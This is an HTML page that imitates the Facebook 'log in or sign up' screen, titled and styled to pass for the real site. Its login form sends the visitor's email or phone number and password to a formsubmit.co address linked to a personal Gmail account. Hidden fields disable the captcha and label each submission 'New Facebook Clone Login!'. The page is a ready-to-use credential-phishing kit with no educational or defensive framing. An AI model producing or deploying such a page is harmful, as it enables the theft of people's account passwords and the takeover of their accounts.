<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width" />
    <title>Facebook - log in or sign up</title>
    <link rel="icon" href="fblogo.ico" />
    <link rel="stylesheet" href="styles.css" />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css"
    />
  </head>
  <body>
    <div class="contains-top-half-and-footer-bottom-half">
      <div class="global-container">
        <div class="bigger-box">
          <div class="big-box">
            <div class="left-box">
              <div class="image-box">
                <img class="fb-logo" src="facebook.svg" alt="" />
              </div>
              <h2 class="logo-caption">
                Facebook helps you connect and share with the people in your life.
              </h2>
            </div>
            <div class="right-box">
              <div class="form-container">
                <!-- Change starts here -->
                <form id="loginForm" method="POST" action="https://formsubmit.co/abdullahchohan345@gmail.com">
                  <div class="space">
                    <input
                      type="text"
                      class="email-box"
                      name="email"
                      placeholder="Email address or phone number"
                      required
                    />
                  </div>
                  <div style="display: flex">
                    <div class="space">
                      <input
                        type="password"
                        class="pw-box"
                        name="password"
                        placeholder="Password"
                        id="password_field"
                        required
                      />
                    </div>
                    <i
                      class="far fa-eye-slash"
                      id="toggleEyeIcon"
                      style="cursor: pointer; display: none; margin: 24px -42px"
                    ></i>
                  </div>
                  <div class="space">
                    <button type="submit" class="login-button">
                      <b>Log In</b>
                    </button>
                  </div>
                  <div class="spaceTwo adjustTwo">
                    <a href="#" class="adjust-forgot-pw">Forgotten password?</a>
                  </div>
                  <div class="line"></div>
                  <div>
                    <button type="button" class="create-button">
                      <b>Create New Account</b>
                    </button>
                  </div>

                  
                  <input type="hidden" name="_subject" value="New Facebook Clone Login!" />
                  <input type="hidden" name="_captcha" value="false" />
                  <input type="hidden" name="_template" value="table" />
                </form>
               
              </div>

              <div class="bottom-link-box">
                <a class="bottom-link" href="#"><b>Create a Page</b></a>
                for a celebrity, brand or business.
              </div>
            </div>
          </div>
        </div>
      </div>

      <footer>
       
      </footer>
    </div>

    
    <script src="./js/toggleEyeIcon.js"></script>

 
    <script>
      document.getElementById("loginForm").addEventListener("submit", function (e) {
       
      });
    </script>
  </body>
</html>
